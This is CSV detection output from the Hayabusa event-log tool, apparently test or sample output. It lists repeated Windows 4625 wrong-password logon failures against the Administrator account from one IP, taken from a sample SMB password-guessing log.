+2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
